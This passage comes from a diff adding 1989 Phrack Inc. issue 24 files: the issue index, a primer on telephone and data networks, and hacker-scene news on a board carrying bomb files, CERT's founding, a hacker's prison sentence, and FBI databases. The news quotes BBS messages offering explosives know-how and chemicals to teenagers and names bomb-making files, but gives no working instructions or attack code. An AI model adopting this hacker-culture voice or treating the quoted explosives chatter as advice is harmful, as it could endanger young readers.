+any use of the electric lines for bugging purposes, and give off a frantic
+beep-beep! if anyone picks up an extension phone.
+
+As sophisticated as this device is, there is one thing its promoters won't say
+it will do, detect a wiretap by the FBI.  With the connection made in a place
+where no de-bugger will be allowed to check, and the G-men monitoring it on
+equipment no meter will detect, you can simply never know if the Government is
+listening.  So if you're a businessman and think you're bugged by competitors,
+you're probably wrong.  If you're a spouse or lover whose amours have gone
+public, the listening device can be found but probably nothing will be done
+about it.  And if you're being listened to by the Biggest Ear of all, the
+Government, you'll never really know until you get your "wiretap notice."
+
+
+                                    VaxCat
+_______________________________________________________________________________
diff --git a/phrack24/1.txt b/phrack24/1.txt
new file mode 100644
index 0000000..72477bc
--- /dev/null
+++ b/phrack24/1.txt
@@ -0,0 +1,48 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 1 of 13
+
+                    Phrack Inc. Newsletter Issue XXIV Index
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                               February 25, 1989
+
+     Welcome to Phrack Inc. Issue 24.  We're happy to be able to say that we've
+been keeping with our proposed release dates recently as opposed to our
+problems with delays in the past.
+
+     A little clearing up needs to be done briefly.  We have received questions
+about the volume number being only 2 when, year-wise, it should be at about 4.
+In our opinion, a volume consists of 12 issues, ideally having 1 issue per
+month.  Unfortunately, we have not been able, in the past, to keep up the pace.
+If you're looking forward to a volume change, though, watch for issue 25 to
+lead into Volume 3 of Phrack Inc.
+
+     A brief announcement about SummerCon '89 appears in Phrack World News XXIV
+and more details will be released as they develop.
+
+     As always, we ask that anyone with network access drop us a line to either
+our Bitnet accounts or our Internet addresses (see signoff).
+
+     In this issue, we feature the conclusion of the Future Transcendent Saga
+as well as a supplement file of sorts to it called Advanced Bitnet Procedures
+submitted by VAXBusters International.  We hope you enjoy it!
+
+               Taran King                        Knight Lightning
+          C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
+       C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXIV Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile XXIV Featuring Chanda Leir by Taran King
+3.  Limbo To Infinity; Chapter Three of FTSaga by Knight Lightning
+4.  Frontiers; Chapter Four of FTSaga by Knight Lightning
+5.  Control Office Administration Of Enhanced 911 Service by The Eavesdropper
+6.  Glossary Terminology For Enhanced 911 Service by The Eavesdropper
+7.  Advanced Bitnet Procedures by VAXBusters International
+8.  Special Area Codes by >Unknown User<
+9.  Lifting Ma Bell's Cloak Of Secrecy by VaxCat
+10. Network Progression by Dedicated Link
+11-13. Phrack World News XXIV by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack24/10.txt b/phrack24/10.txt
new file mode 100644
index 0000000..c48e61a
--- /dev/null
+++ b/phrack24/10.txt
@@ -0,0 +1,86 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 24, File 10 of 13
+
+                    ()()()()()()()()()()()()()()()()()()()
+                    ()                                  ()
+                    ()        Network Progression       ()
+                    ()                                  ()
+                    ()         by Dedicated Link        ()
+                    ()                                  ()
+                    ()           January 1989           ()
+                    ()                                  ()
+                    ()()()()()()()()()()()()()()()()()()()
+
+
+This file provides a general overview of how networks have progressed from
+phone lines to T1 lines.
+
+There are numerous reasons to share networking facilities.  The concept of
+networking is to optimize all the aspects of voice and data transmission, and
+to utilize all the amounts of space in the transmission lines.
+
+Not long ago companies used AT&T's switching facilities for all local calls.
+This means use of the Centrex, which is the switching of local calls by AT&T
+(which is much more expensive than using your own switching facilities).  Then
+the larger organizations started to put in PBXes (Private Branch Exchange) to
+enable them to switch local calls (class 5 ESS) without having anything to do
+with AT&T.  The process of using a PBX (or a Computerized Branch Exchange CBX)
+is much more efficient if the phone traffic is high.  This is the beginning of
+a Local Area Network (LAN).  Once an organization has it's own LAN it can lease
+the extra transmission space to another company, because they are paying for it
+anyway.  Another method of bypassing AT&T's service is to use a foreign
+exchange (FX) line.  Which is a long distance dedicated point-to-point private
+line, which is paid for on a flat rate basis.  A FX line can be purchased from
+AT&T or many other vendors.  These private lines (PL) are used with voice and
+data transmissions.  Data transmission must have a higher grade quality than
+voice because any minor break in the transmission can cause major, expensive
+errors in data information being processed.
+
+One of the most optimum ways of transmitting data is a T1 line which transmits
+data at 1.544 megabits per second. Microwave, Satellite, and Fiber Optic
+systems are being used for data transmission.  These methods multiplex several
+lines into one to create greater capacity of the transmission.  A multiplexed
+line has 24 channels that can be divided into the appropriate space needed to
+utilize each transmission (i.e. a simple voice transmission which has about
+300-3000 Hz uses a small portion of the multiplexed line).  There are two types
+of multiplexing; time-division and frequency.  Time-division multiplexing
+divides the channels into separate time slots.  Frequency-division multiplexing
+separates the different channels with the use of different bandwidths.
+Typically, data is transmitted through digital systems rather than analog.
+However, all the state-of-the-art equipment is now digital.
+
+When the data is being processed from the computer to another computer there
+must be a standard protocol for communicating the interexchange within the
+network.  The protocol is the set of rules that the computer says are necessary
+to have in order for the other computer to connect to it.  This is the standard
+way of communicating (The American Standard Code for Interface Interexchange,
+ASCII).  Also, there are encryption codes which are used for security reasons.
+Encryption codes can be scrambled on a hourly, daily, weekly, or monthly basis,
+depending on the level of security.
+
+The information that is being sent is organized by packet switching.  The most
+used packet switching is called X.25, and this is the interface that the CCITT
+(Comittee Consultif Interaction Telephonique & Telegraphique) recommends to use
+for connection between the Data Terminal Equipment (DTE) and the Data
+Circuit-terminating Equipment (DCE).
+
+Within this network it is crucial that there is software providing Automatic
+Route Selection (ARS).  There must be an ARS (the least cost path length)
+programmed within the transmission.  It is the job of the system analyst or
+operator to assign the proper cost of each path where the transmission goes in
+order for the packet to go through it's least cost route (LCR).
+
+The packet travels through a path from it's source to it's final destination.
+The system analyst or operator must have full knowledge of the exact path
+length, the exact alternative path length, plus the exact third alternative
+path length.  The path length is measured in hops, which equals to the number
+of circuits between central nodes.  The system manager must set a maximum value
+of hops at which the path can never exceed.  This is the actual circuit cost
+which is assigned to each possible path.  It is important that the system
+manager has knowledge of the circuit costs in order for the ARS to be
+programmed effectively.
+
+These are just some of the basics that are involved in transmitting information
+over a network.  I hope it helped you lots!
+_______________________________________________________________________________
diff --git a/phrack24/11.txt b/phrack24/11.txt
new file mode 100644
index 0000000..7980c77
--- /dev/null
+++ b/phrack24/11.txt
@@ -0,0 +1,427 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 24, File 11 of 13
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXIV/Part 1                PWN
+            PWN                                                 PWN
+            PWN                February 25, 1989                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Time And Time Again
+~~~~~~~~~~~~~~~~~~~
+Greetings to everyone!  This issue of Phrack Inc. marks the completion of the
+plan I had conceived a little more than one year ago -- "The Phoenix Project."
+No, not the bulletin board run by The Mentor (although the name of the board
+came from this plan), my scheme to rebuild the hacking community from its
+remaining ashes of the "Crisis of 1987."  My plan had several parts that needed
+to come together.
+
+-  Announce the plan and pour lots of hype into it to spur great enthusiasm.
+-  Hold SummerCon '88 in St. Louis, Missouri to get today's hackers to meet.
+-  Regain control of Phrack Inc. and put it back on its feet.
+-  Release the Vicious Circle Trilogy to expose and defeat our security
+   problems.
+-  Bring today's hackers into the next Millennium with The Future Transcendent
+   Saga (which helps to unite yesterday's hackers with the present).
+
+And now...
+
+Announcing The 3rd Annual...
+
+                                 SummerCon '89
+                                 ~~~~~~~~~~~~~
+                             Saint Louis, Missouri
+                               July 23-25, 1989
+
+The date is a tentative one, but I would imagine that it will not change.
+For more information please contact Taran King or Knight Lightning.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+On the lighter side, this issue of Phrack World News contains articles dealing
+with Shadow Hawk, The Disk Jockey, Compaq, the FBI "Super" Database, the
+Australian-American Hackers Ring, Computer Emergency Response Team, StarLink,
+The Xenix Project, The Lost City of Atlantis, The Beehive BBS, and much more.
+So read it and enjoy.
+
+For any questions, comments, submissions of articles, or whatever, I can be
+reached at C483307@UMCVMB.MISSOURI.EDU or C483307@UMCVMB.BITNET or whatever
+bulletin board you can find me on.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Explosives Expertise Found In Computer                          January 5, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Matt Neufeld (The Washington Times)
+
+One of the four Bethesda youths killed in an explosion in the garage at the
+home of the Brazilian Embassy's attache last weekend had access to a local
+computer system's how-to listing of bombs and explosives, according to a system
+member.
+
+"He was highly involved with computers," said the computer operator of the
+18-year-old Dov Fischman, one of the teens killed by the explosion.  "Dov used
+to go over to my friend's house," where they discussed various types of
+software and computer systems, he said.
+
+Located within an elaborate computer system of about 200 private bulletin
+boards is a board titled "The Lost City of Atlantis" that contains files under
+the following names:  "Pipe Bombs,"  Gas Tank Bombs," "Make Smoke Bombs," "Soda
+Bombs," "Explosive Info," "Kitchen Improvised Plastic Explosives," and "Plastic
+Explosives," according to system files reviewed yesterday by the Washington
+Times.
+
+Details on committing mischief and various illegal activities fill the files of
+Atlantis and other boards in the system.  The Atlantis board is listed under
+the heading, "The Rules of Anarchy."
+
+The files on Atlantis, which is run locally, but could be accessed by computer
+owners nationwide, include information and correspondence on how to buy various
+chemicals and and explosives used to make bombs.  Other files have explanations
+on how to use these materials to fashion the bombs.
+
+"Some or all of you reading this may have caught word from the grapevine that I
+sell laboratory materials and/or chemicals," begins one message from a system
+worker who operates under the pseudonym "The Pyromaniac."
+
+"I can get for you almost any substance you would want or need," the message
+says later.  "Always remember that I am flexible; Your parents need not know
+about the chemicals."
+
+Mr. Fischman and the other teens have been described by friends and relatives
+as highly intelligent, hard-working honor students.  They were killed about
+3:15 a.m. Saturday in an explosion at the home of attache Vera Machado in the
+6200 block of Verne Street.  A Montgomery County Police investigation
+determined the cause was accidental and caused by the youths "experimenting
+with some type of explosive."
+
+Nitrates, peroxides and carbonates were found at Mr. Fischman's home, along
+with literature on "resources for chemicals and appliances and recipes
+utilized for explosive devices," said fire marshal's spokesman Mike Hall.  "The
+exact nature of resources and recipes has not been disclosed by the
+investigative section, as the investigation is going on."
+
+"I have no knowledge that any computer system information was used," but that
+possibility will be investigated, Mr. Hall said.  Mr. Fischman's father, Joel,
+yesterday said his son and the other three youths were involved with computers.
+But he said he was not aware of any connection between computers and the
+explosion.  He referred further questions to the police.
+
+The local computer system operator said most users are 15 to 19 years old.  The
+operator, however, said it is common for users of the system to peruse the
+files while their parents have no knowledge of the contents.
+
+The boards and files are legal, and the bomb information is primarily confined
+to "private" bulletin boards created by persons known as "system operators."
+
+However, anyone with a home computer, a telephone and a modem can hook up to
+the bulletin boards if they gain approval of the individual operators, the
+operator said.
+
+"I think this should be allowed, but not just for any kids," said the operator,
+who is an adult.  He said it's "really the parents' fault" for not supervising
+their children's computer access.
+
+Another board in the system, "Warp Speed," also provides information on
+explosives.  That board was shut down sometime between December 30, 1988 and
+January 1, 1989 the operator said.  That board is "host" to "Damage, Inc.,"
+which is a "group of people who concentrate on explosives, things to screw
+people up, damage," he said.
+
+In the "Beehive" board the following message appears from "Mister Fusion:"
+
+     "low cost explosives are no problem.  make them yourself.  what do
+      you want rdx?  detonators, low explosives?  high explosives?  i can
+      tell you what to do for some, but I would reccomend (sic) cia black
+      books 1-3."
+
+Other boards and files in the system include information on computer hacking,
+constructing a device to jam police radar detectors, picking locks, and
+"phreaking," which is computer jargon for using computers to make free
+telephone calls.
+
+Some of these files are: "Making LSD," "Listing of common household chemicals,"
+"Info on Barbiturates," "Make a mini-flame thrower," How to make a land mine,"
+"How to Hot Wire a car," "Home Defense: part II, guns or friends," "How to have
+fun with someone else's car," "Fun! with Random Senseless Violence," "Picking
+up little girls," and "How to break into a house."
+
+"A lot of the information is wrong, in the phreaker world, regarding ways to
+defeat the telephone company," said the operator, who has been involved with
+computers for at least six years. "But the bomb information is pretty much
+accurate."
+
+In the two page, "High Explosives" file, there are detailed explanations on how
+to use the chemicals cacodyal, tetryl and mercury fulminate.
+
+"This stuff is awesome," begins the section on cacodyal.  "It is possesses
+flammability when exposed to air.  Plus it will release a cloud of thick white
+smoke.  The smoke just happens to be arsenic."
+
+The file does offer this warning at the end:  "Don't attempt to make these
+things unless you are experienced in handling chemicals.  They can be very
+dangerous if not handled properly."
+
+The "Kitchen Improvised Plastic Explosives" file, which instructs users on "how
+to make plastique from bleach" and is credited to a Tim Lewis, warns that the
+chemicals are dangerous."
+_______________________________________________________________________________
+
+Computer Emergency Response Team (CERT)                        January 23, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Excerpted from UNIX Today
+
+WASHINGTON -- The federal government's newly formed Computer Emergency Response
+Team (CERT) is hoping to sign up 100 technical experts to aid in its battle
+against computer viruses.
+
+CERT, formed last month by the Department of Defense's Advanced Research
+Project Agency (DARPA), expects to sign volunteers from federal, military, and
+civilian agencies to act as advisors to users facing possible network invasion.
+
+DARPA hopes to sign people from the National Institute of Science and
+Technology, the National Security Agency, the Software Engineering Institute,
+and other government-funded university laboratories, and even the FBI.
+
+The standing team of UNIX security experts will replace an ad hoc group pulled
+together by the Pentagon last November to deal with the infection of UNIX
+systems allegedly brought on by Robert Morris Jr., a government spokesman said.
+
+CERT's charter will also include an outreach program to help educate users
+about what they can do the prevent security lapses, according to Susan Duncal,
+a spokeswoman for CERT.  The group is expected to produce a "security audit"
+checklist to which users can refer when assessing their network vulnerability.
+The group is also expected to focus on repairing security lapses that exist in
+current UNIX software.
+
+To contact CERT, call the Software Engineering Institute at Carnegie-Mellon
+University in Pittsburgh at (412) 268-7090; or use the Arpanet mailbox address
+cert@sei.cmu.edu.
+_______________________________________________________________________________
+
+The Xenix Project aka The Phoenix Project Phase II                 January 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There are some big changes in store for everyone's favorite bulletin board.
+
+As of January 25, 1989, The Mentor became the proud owner of the complete SCO
+Xenix system, complete with the development kit and text utilities (a $1200
+investment, but worth it).  He has arranged for a UUCP mail and USENET
+newsfeed, and is working on getting bulletin board software up and running on
+it.
+
+So what does this mean to you?  As I have been illustrating throughout The
+Future Transcendent Saga and a few other files/places, the future lies in the
+wide area networks.  So now for the first time ever, The Mentor is offering the
+hackers a cheap, *LEGAL* way to access the gigabytes of information available
+through USENET.  Mail can be sent through BITNET, MILNET, ARPANET, and INTERNET
+gateways to users all over the world.  In short, connectivity has arrived and
+the future grows ever closer.
+
+The first thing that The Mentor wants to do is get a second hard disk drive.
+There is no way the Xenix Project can run right now without it.  His 40 meg has
+a 20 meg Xenix partition, 17 megs of which is occupied by the /root/ file
+system.  The MS-DOS partition has 12 megs of the board, plus all the programs
+he needs to exist (Pagemaker, Word, Microsoft C, Brief, etc).  A *MINIMUM* of a
+60 meg drive will be needed to support the newsfeed (USENET generated 50 megs
+of traffic in the last 2 weeks).  A 100+ meg drive would be better.  Once a
+hard disk is obtained, the system will go online as a single-line UNIX machine.
+Hopefully, enough money will be generated to add a second phone line and modem
+quickly.  At this point the system will begin to take off.
+
+The Mentor's eventual goal (inside 6 months) is to have 4-6 300-2400 baud lines
+available for dialin on a hunt group, plus a 19.2Kbaud line for getting the
+USENET feed.  The estimated startup cost for a 5-line system is:
+
+    110 meg hard disk........................ $1000
+    4 2400 baud modems (I've got 1 already).. $ 525
+    Installation of 4 phone lines............ $ 450
+    MultiPort Serial Card.................... $ 300
+    SCO Xenix Software....................... $1200
+                                              ~~~~~
+                                              $3475
+
+Financing is a problem.  The Mentor has already sunk the $1200 into the Xenix
+package (plus his original purchase of the computer system), leaving him $2200
+away from the best hacker system in the world.  There are two ways that he
+hopes on getting the money for the rest of the system.
+
+A) Donations - Many users have already indicated that they will send in
+               anywhere from $10 to $100.  Surprisingly enough, the security
+               people on The Phoenix Project have been extremely generous.
+               There *is* an incentive to donate, as will be shown below.
+B) Monthly fees - There will be a $5-$12.50 charge per month to use the UNIX
+                  side of the system, but the Phoenix Project BBS will remain
+                  free!  Here is how it works:
+
+   Level 1 - BBS Only.  Anyone who wishes to use only The Phoenix Project will
+   call and log in to account name 'bbs.'  They will be forced into the BBS
+   software, at which point they will log in as usual.  As far as they're
+   concerned, this is just a change of software with the addition of the front
+   end password 'bbs.'
+
+   Level 2 - Individual Mail & News account.  For $5 a month, a user will get
+   their own private account with full access to UUCP mail and USENET news.
+   They will be able to send mail all over the world and to read and post to
+   the hundreds of USENET newsgroups. Legally, for a change!
+
+   Level 3 - Individual Mail, News, Games, and Chat.  The user will have all
+   the privileges of a Level 2 person, be able to access games such as Rogue,
+   Chase, and Greed, plus will have access to the multi-user chat system
+   similar to the one running on Altos in West Germany, allowing real-time
+   conferencing between hackers here in the states without having to have an
+   NUI to get to Datex-P.  This will cost $10 per month.
+
+   Level 4 - Full Bourne Shell access.  This will allow access to the full
+   system, including the C compiler, text utilities, and will include access to
+   the online laser printer for printing term papers, important documents, or
+   anything else (mailing will incur a small fee.)  Level 4 access will be
+   restricted to people technically sophisticated enough to know how to use and
+   how not to use UNIX compilers.  The entire Xenix Development System and
+   Text Processing Utilities are installed, including online manual pages.  I
+   will aid people in debugging and testing code whenever needed.  Charge is
+   $12.50 per month.
+
+C) Why Donate? - Simple.  You get a price break.  Here are the charter
+   membership categories:
+
+   Contributing: $20  You receive 6 months of Level 2 access, a $10 savings
+                 over the monthly fees.
+
+   Supporting:   $45  You receive either 1 year of Level 2 access or 6 months
+                 of Level 3 access.
+
+   Sustaining:   $75  You receive 1 year of Level 3 access, or life time level
+                 2 access.
+
+   Lifetime:     $100  You receive lifetime Level 4 access.  Contributions in
+                 amounts less than $20 will be directly applied toward Level 2
+                 access (e.g. A $10 donation will give you 2 months Level 2
+                 access).
+
+   Hardware contributions will definitely be accepted in return for access.
+                       Contact me and we'll cut a deal.
+
+                      Information Provided by The Mentor
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+A Few Notes From The Mentor
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+People -- I am not trying to make a profit off of this.  If I could afford the
+hardware I'd buy it.  The Phoenix Project has been committed to bringing you
+the best in hack/phreak information available, and will continue to do so FREE.
+
+I stress, even after the switch is made, The Phoenix Project BBS will be
+available under a un-pass-worded login that anyone can log into and use.  It's
+only if you want to enter the world of networks in a *LEGAL* manner that I need
+to get money .
+
+The system will expand as interest in it expands.  If I never get enough paid
+users to add more than one line, it will remain a one-line system.  I think
+enough people will see the advantages of UUCP and USENET to be willing to shell
+out the cost of a 6-pack of good beer to get access.
+
+As a side note to UNIX hacks out there, this system will also offer a good
+place to explore your UNIX hacking techniques.  Unlike other systems that
+penalize you for breaking security, I will reward people who find holes in my
+security.  While this will mostly only apply to Level 4 people (the only ones
+not in a restricted shell), 3-6 months of free access will be given to people
+discovering security loopholes.  So if you've ever wanted an unrestricted
+environment for learning/perfecting your UNIX, this is it!
+
+For more information, I can be reached at:
+
+The Phoenix Project: 512-441-3088
+Shadowkeep II:       512-929-7002
+Hacker's Den 88:     718-358-9209
+
+Donations can be sent to:  Loyd
+                           PO Box 8500-615
+                           San Marcos, TX  78666
+                           (make all checks payable to Loyd)
+
++++The Mentor+++
+
+
+                           "The Future is Forever!"
+_______________________________________________________________________________
+
+Breaking Into Computers Is A Crime, Pure And Simple            December 4, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Edward A Parrish Jr., Past President, IEEE Computer Society
+Originally printed in Los Angeles Times
+
+During the last few years, much has been written to publicize the feats
+of computer hackers.  There was, for example, the popular movie War Games,
+about a teen-ager who, using his home computer, was able to tap into a military
+computer network and play games with the heart of the system.  The games got
+of control when he chose to play "thermonuclear war."  The teen-ager, who was
+depicted with innocent motives, eventually played a crucial role in solving the
+problem and averting a real nuclear exchange, in the process emerging as hero.
+
+A real-life example in early November involved a so-called computer virus
+(a self-replicating program spread over computer networks and other media as a
+prank or act of vandalism), which nearly paralyzed 6,000 military and academic
+computers.
+
+Unfortunately, perhaps because the effect of such "pranks" seems remote to most
+people, it is tempting to view the hacker as something of a folk hero - a lone
+individual who, armed with only his own ingenuity, is able to thwart the
+system.  Not enough attention is paid to the real damage that such people can
+do.  But consider the consequences of a similar "prank" perpetrated on our
+air-traffic control system, or a regional banking system, or a hospital
+information system.  The incident in which an electronic intruder broke into an
+unclassified Pentagon computer network, altering or destroying some files,
+caused potentially serious damage.
+
+We do not really know the full effect of the November virus incident that
+brought many computers on the Cornell-Stanford network to a halt, but credible
+published estimates of the cost in man-hours and computer time have been in the
+millions of dollars.  The vast majority of professional computer scientists and
+engineers who design, develop, and use these sophisticated networks are
+dismayed by this total disregard of ethical practice and forfeiture of
+professional integrity.
+
+Ironically, these hackers are perhaps driven by the same need to explore, to
+test technical limits that motivates computer professionals; they decompose
+problems, develop an understanding of them and then overcome them.  But
+apparently not all hackers recognize the difference between penetrating the
+technical secrets of their own computer and penetrating a network of computers
+that belong to others. And therein lies a key distinction between a computer
+professional and someone who knows a lot about computers.
+
+Clearly a technical degree is no guarantee of ethical behavior.  And hackers
+are not the only ones who abuse the power inherent in their knowledge.  What,
+then, can we do?
+
+For one thing, we - the public at large - can raise our own consciousness;
+Specifically, when someone tampers with someone else's data or programs,
+however clever the method, we all need to recognize that such an act is at best
+irresponsible and very likely criminal.  That the offender feels no remorse, or
+that the virus had unintended consequences, does not change the essential
+lawlessness of the act, which is in effect breaking-and-entering.  And
+asserting that the act had a salutary outcome, since it lead to stronger
+safeguards, has no more validity than if the same argument were advanced in
+defense of any crime.  If after experiencing a burglary I purchase a burglar
+alarm for my house, does that excuse the burglar?  Of course not.  Any such act
+should be vigorously prosecuted.
+
+On another front, professional societies such as the IEEE Computer Society can
+take such steps to expel, suspend, or censure as appropriate any member found
+guilty of such conduct.  Finally, accrediting agencies, such as the Computing
+Sciences Accreditation Board and the Accreditation Board for Engineering and
+Technology, should more vigorously pursue their standards, which provide for
+appropriate coverage of ethical and professional conduct in university computer
+science and computer engineering curriculums.
+
+We are well into the information age, a time when the computer is at least as
+vital to our national health, safety and survival as any other single resource.
+The public must insist on measures for ensuring computer security to the same
+degree as other technologies that are critical to its health and safety.
+_______________________________________________________________________________
diff --git a/phrack24/12.txt b/phrack24/12.txt
new file mode 100644
index 0000000..18bd8ba
--- /dev/null
+++ b/phrack24/12.txt
@@ -0,0 +1,390 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 24, File 12 of 13
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXIV/Part 2                PWN
+            PWN                                                 PWN
+            PWN                February 25, 1989                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Shadow Hawk Gets Prison Term                                  February 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+An 18 year old telephone phreak from the northside/Rogers Park community in
+Chicago who electronically broke into U.S. military computers and AT&T
+computers, stealing 55 programs was sentenced to nine months in prison on
+Tuesday, February 14, 1989 in Federal District Court in Chicago.
+
+Herbert Zinn, Jr., who lives with his parents on North Artesian Avenue in
+Chicago was found guilty of violating the Computer Fraud and Abuse Act of
+1986 by Judge Paul E. Plunkett.  In addition to a prison term, Zinn must pay
+a $10,000 fine, and serve two and a half years of federal probation when
+released from prison.
+
+United States Attorney Anton R. Valukas said, "The Zinn case will serve to
+demonstrate the direction we are going to go with these cases in the future.
+Our intention is to prosecute aggressively.  What we undertook is to address
+the problem of unauthorized computer intrusion, an all-too-common problem that
+is difficult to uncover and difficult to prosecute..."
+
+Zinn, a dropout from Mather High School in Chicago was 16-17 years old at
+the time he committed the intrusions, using his home computer and modem.  Using
+the handle "Shadow Hawk," Zinn broke into a Bell Labs computer in Naperville,
+IL; an AT&T computer in Burlington, NC; and an AT&T computer at Robbins Air
+Force Base, GA.  No classified material was obtained, but the government views
+as 'highly sensitive' the programs stolen from a computer used by NATO which is
+tied into the U.S. missile command.  In addition, Zinn made unlawful access to a
+a computer at an IBM facility in Rye, NY, and into computers of Illinois Bell
+Telephone Company and Rochester Telephone Company, Rochester, NY.
+
+Assistant United States Attorney William Cook said that Zinn obtained access to
+the AT&T/Illinois Bell computers from computer bulletin board systems, which he
+described as "...just high-tech street gangs."  During his bench trial during
+January, Zinn spoke in his own defense, saying that he took the programs to
+educate himself, and not to sell them or share them with other phreaks.  The
+programs stolen included very complex software relating to computer design and
+artificial intelligence.  Also stolen was software used by the BOC's (Bell
+Operating Companies) for billing and accounting on long distance telephone
+calls.
+
+The Shadow Hawk -- that is, Herbert Zinn, Jr. -- operated undetected for at
+least a few months in 1986-87, but his undoing came when his urge to brag about
+his exploits got the best of him.  It seems to be the nature of phreaks and
+hackers that they have to tell others what they are doing.  On a BBS notorious
+for its phreak/pirate messages, Shadow Hawk provided passwords, telephone
+numbers and technical details of trapdoors he had built into computer systems,
+including the machine at Bell Labs in Naperville.
+
+What Shadow Hawk did not realize was that employees of AT&T and Illinois Bell
+love to use that BBS also; and read the messages others have written.  Security
+representatives from IBT and AT&T began reading Shadow Hawk's comments
+regularly; but they never were able to positively identify him.  Shadow Hawk
+repeatedly made boasts about how he would "shut down AT&T's public switched
+network."  Now AT&T became even more eager to locate him.  When Zinn finally
+discussed the trapdoor he had built into the Naperville computer, AT&T decided
+to build one of their own for him in return; and within a few days he had
+fallen into it.  Once he was logged into the system, it became a simple matter
+to trace the telephone call; and they found its origin in the basement of the
+Zinn family home on North Artesian Street in Chicago, where Herb, Jr. was busy
+at work with his modem and computer.
+
+Rather than move immediately, with possibly not enough evidence for a good,
+solid conviction, everyone gave Herb enough rope to hang himself.  For over two
+months, all calls from his telephone were carefully audited.  His illicit
+activities on computers throughout the United States were noted, and logs were
+kept.  Security representatives from Sprint made available notes from their
+investigation of his calls on their network.  Finally the "big day" arrived,
+and the Zinn residence was raided by FBI agents, AT&T/IBT security
+representatives and Chicago Police detectives used for backup.  At the time of
+the raid, three computers, various modems and other computer peripheral devices
+were confiscated.  The raid, in September, 1987, brought a crude stop to Zinn's
+phreaking activities.  The resulting newspaper stories brought humiliation and
+mortification to Zinn's parents; both well-known and respected residents of the
+Rogers Park neighborhood.  At the time of the younger Zinn's arrest, his father
+spoke with authorities, saying, "Such a good boy! And so intelligent with
+computers!"
+
+It all came to an end Tuesday morning in Judge Plunkett's courtroom in Chicago,
+when the judge imposed sentence, placing Zinn in the custody of the Attorney
+General or his authorized representative for a period of nine months; to be
+followed by two and a half years federal probation and a $10,000 fine.  The
+judge noted in imposing sentence that, "...perhaps this example will defer
+others who would make unauthorized entry into computer systems."  Accepting the
+government's claims that Zinn was "simply a burglar; an electronic one... a
+member of a high-tech street gang," Plunkett added that he hoped Zinn would
+learn a lesson from this brush with the law, and begin channeling his expert
+computer ability into legal outlets.  The judge also encouraged Zinn to
+complete his high school education, and "become a contributing member of
+society instead of what you are now, sir..."
+
+Because Zinn agreed to cooperate with the government at his trial, and at any
+time in the future when he is requested to do so, the government made no
+recommendation to the court regarding sentencing.  Zinn's attorney asked the
+court for leniency and a term of probation, but Judge Plunkett felt some
+incarceration was appropriate.  Zinn could have been incarcerated until he
+reaches the age of 21.
+
+His parents left the courtroom Tuesday with a great sadness.  When asked to
+discuss their son, they said they preferred to make no comment.
+
+                  Information Collected From Various Sources
+_______________________________________________________________________________
+
+FBI National Crime Information Center Data Bank               February 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Evelyn Richards (Washington Post)
+
+ "Proposed FBI Crime Computer System Raises Questions on Accuracy, Privacy --
+      Report Warns of Potential Risk Data Bank Poses to Civil Liberties"
+
+On a Saturday afternoon just before Christmas last year, U.S. Customs officials
+at Los Angeles International Airport scored a "hit."
+
+Running the typical computer checks of passengers debarking a Trans World
+Airlines flight from London, they discovered Richard Lawrence Sklar, a fugitive
+wanted for his part in an Arizona real estate scam.
+
+As their guidelines require, Customs confirmed all the particulars about Sklar
+with officials in Arizona - his birth date, height, weight, eye and hair color
+matched those of the wanted man.
+
+Sklar's capture exemplified perfectly the power of computerized crime fighting.
+Authorities thousands of miles away from a crime scene can almost instantly
+identify and nab a wanted person.
+
+There was only one problem with the Sklar case:  He was the wrong man.  The
+58-year old passenger - who spent the next two days being strip-searched,
+herded from one holding pen to another and handcuffed to gang members and other
+violent offenders - was a political science professor at the University of
+California at Los Angeles.
+
+After being fingered three times in the past dozen years for the financial
+trickeries of an impostor, Sklar is demanding that the FBI, whose computer
+scored the latest hit, set its electronic records straight.  "Until this person
+is caught, I am likely to be victimized by another warrant," Sklar said.
+
+Nowhere are the benefits and drawbacks of computerization more apparent than
+at the FBI, which is concluding a six-year study on how to improve its National
+Crime Information Center, a vast computer network that already links 64,000 law
+enforcement agencies with data banks of 19 million crime-related records.
+
+Although top FBI officials have not signed off on the proposal, the current
+version would let authorities transmit more detailed information and draw on a
